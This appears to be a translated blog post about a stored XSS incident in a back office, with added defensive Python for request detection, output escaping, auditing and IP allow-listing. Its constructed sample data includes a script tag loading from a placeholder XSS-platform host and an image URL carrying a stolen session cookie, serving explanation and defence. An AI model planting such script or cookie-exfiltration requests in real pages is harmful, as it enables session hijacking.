Recalling an XSS injection problem

  Subject: Business staff suddenly reported that the back-office data display was abnormal, so the technical cause had to be found.

1. Troubleshooting

  While troubleshooting I found that user-submitted content was stored without any back-end XSS filtering, so a script ended up in the database. That script was returned to the front end together with the content, and because the script tag was not closed, page rendering broke off at that point and the page was not displayed correctly.

Figure: the record as stored in the database; its content contains a script tag.

2. Analysis

  I was curious about the XSS itself, so I took a closer look at how an injected JS script actually carries out its malicious work.

  I prepared a local web project, put the content shown above into the login page, and watched the browser's Network tab.

Figure: Network tab

  In the figure above there are three abnormal requests.

Abnormal request 1

  The first OrAI request is redirected with a 301 because my local project runs over http while the attacker's site is https: requests for its resources have to be https, so the request is 301-redirected to https.

Figure: the first OrAI request

Abnormal request 2

  The second OrAI request returns a JS script.

Figure: the second OrAI request

  This JS is very simple: it reads the page URL and the cookie, then disguises a request as an image load, attaching them as parameters on the "image" link and sending them to the other side. With the URL and the cookie, the other side can do whatever they want in the back office.

Abnormal request 3

  The third request is the one that sends our data to the other side, and it is very obvious.

Figure: Second request

  As can be seen from the Network tab, the request sends the data to an XSS platform.
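The three abnormal requests the author picked out of the Network tab follow a recognisable pattern: a script fetched from a host the application never talks to, an http-to-https redirect on that host, and an "image" request whose query string carries the page URL and the cookie. The following added example (not code from the original post) turns that pattern into a small detector over a constructed network log. The allow-listed hosts, the parameter names and the placeholder host `xss-platform.invalid` are assumptions for the example.

```python
"""Flag abnormal requests in a captured browser network log.

Added example, not from the original post. The log entries below are
constructed to imitate what the Network tab showed, with the placeholder
host xss-platform.invalid standing in for the XSS platform.
"""
from urllib.parse import urlparse, parse_qs

# Hosts the application is expected to talk to (assumption for this example).
ALLOWED_HOSTS = {"localhost", "127.0.0.1", "cdn.example-internal.test"}

# Query parameter names that typically carry exfiltrated browser state.
SENSITIVE_PARAMS = {"cookie", "cookies", "url", "location", "referer", "token"}

# Constructed network log: (method, url, resource_type, status)
NETWORK_LOG = [
    ("GET", "http://localhost:8080/login", "document", 200),
    ("GET", "http://localhost:8080/static/app.js", "script", 200),
    ("GET", "http://xss-platform.invalid/OrAI", "script", 301),
    ("GET", "https://xss-platform.invalid/OrAI", "script", 200),
    ("GET",
     "https://xss-platform.invalid/img.gif"
     "?url=http%3A%2F%2Flocalhost%3A8080%2Fadmin&cookie=JSESSIONID%3Dabc123",
     "image", 200),
]


def analyze_entry(method, url, resource_type, status):
    """Return a list of reasons this request looks abnormal (empty if none)."""
    parsed = urlparse(url)
    host = parsed.hostname or ""
    reasons = []
    if host in ALLOWED_HOSTS:
        return reasons
    # Script loaded from a host that is not part of the application.
    if resource_type == "script":
        reasons.append(f"script loaded from unexpected host {host}")
    # Plain-http request to a third party that was redirected (the 301 seen above).
    if status in (301, 302, 307, 308) and parsed.scheme == "http":
        reasons.append(f"http request to {host} redirected (likely to https)")
    # "Image" request whose query string carries browser state.
    params = {k.lower() for k in parse_qs(parsed.query)}
    leaked = sorted(params & SENSITIVE_PARAMS)
    if leaked and resource_type == "image":
        reasons.append(
            f"image request to {host} carries {', '.join(leaked)} in query string")
    return reasons


def find_exceptions(log):
    """Return [(url, reasons)] for every entry with at least one reason."""
    findings = []
    for method, url, rtype, status in log:
        reasons = analyze_entry(method, url, rtype, status)
        if reasons:
            findings.append((url, reasons))
    return findings


if __name__ == "__main__":
    for url, reasons in find_exceptions(NETWORK_LOG):
        print(url)
        for reason in reasons:
            print("  -", reason)
```

Run against the constructed log it reports exactly the three requests the post describes. The allow-list is the part a real deployment has to get right: a broad one hides the script load, and a first-party host that is missing from it produces noise.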

3. Handling and prevention

  All parameters received by the back end must be filtered for XSS and SQL injection, and the data already in storage has to be corrected.

  However, the data had been added a long time ago, and by rights the attacker should already have been able to make withdrawals, yet we had heard of no related information-security problem. Only later did we realise why: the back office is restricted by IP and can only be opened from IPs on the white list, which to some extent prevents malicious withdrawals.
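The post names three controls: filter what the back end receives, correct the data already stored, and restrict the back office to an IP white list. The following added example (not the author's code) shows the output side of the first control, which is what actually stops a stored `<script>` from executing when the record is drawn, plus an audit over stored rows and an IP allow-list check. The record store, the table layout and the networks in the allow list are constructed for this example.

```python
"""Escape stored content on output, audit existing rows for script tags,
and gate the back office by IP allow list.

Added example, not the author's code. STORED_RECORDS imitates the table
that received the script; the networks in ADMIN_ALLOWLIST are assumptions.
"""
import html
import ipaddress
import re

# Constructed stand-in for the database table that received the script.
# Record 2 carries an unclosed <script> tag, as described in the post.
STORED_RECORDS = [
    {"id": 1, "nickname": "alice", "remark": "normal feedback, a < b"},
    {"id": 2, "nickname": "<script src=https://xss-platform.invalid/OrAI>",
     "remark": ""},
    {"id": 3, "nickname": "bob", "remark": "ok"},
]

# Matches the opening of a script tag regardless of case or spacing.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_cell(value):
    """Escape a stored value before inserting it into an HTML page.

    html.escape turns < > & " ' into entities, so a stored <script ...>
    is shown as text and never parsed as a tag, unclosed or not.
    """
    return html.escape(str(value), quote=True)


def render_row(record):
    """Render one record as a table row with every cell escaped."""
    cells = "".join(f"<td>{render_cell(v)}</td>" for v in record.values())
    return f"<tr>{cells}</tr>"


def audit_records(records):
    """Return (id, field) pairs for rows whose text contains a script tag.

    This is the cleanup step: find what already went into the database
    before the back-end filtering was in place.
    """
    hits = []
    for rec in records:
        for key, val in rec.items():
            if isinstance(val, str) and SCRIPT_TAG.search(val):
                hits.append((rec["id"], key))
    return hits


# Networks allowed to open the back office (assumed values for the example).
ADMIN_ALLOWLIST = [ipaddress.ip_network(n)
                   for n in ("10.0.0.0/8", "203.0.113.7/32")]


def admin_allowed(client_ip):
    """True if client_ip falls inside one of the allow-listed networks."""
    try:
        addr = ipaddress.ip_address(client_ip)
    except ValueError:
        # Garbage in the client address header is never allowed through.
        return False
    return any(addr in net for net in ADMIN_ALLOWLIST)


if __name__ == "__main__":
    for rec in STORED_RECORDS:
        print(render_row(rec))
    print("rows needing cleanup:", audit_records(STORED_RECORDS))
    for ip in ("10.1.2.3", "198.51.100.1"):
        print(ip, "allowed" if admin_allowed(ip) else "denied")
```

Escaping on output protects every place the record is drawn, including ones added later, which is why it belongs alongside the input filtering the post calls for rather than instead of it. The allow-list check has to run on the real client address; if the back office sits behind a proxy, the address must be taken from the proxy's trusted header, not from whatever the client sends.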


Source: blog.csdn.net/zy_281870667/article/details/102959116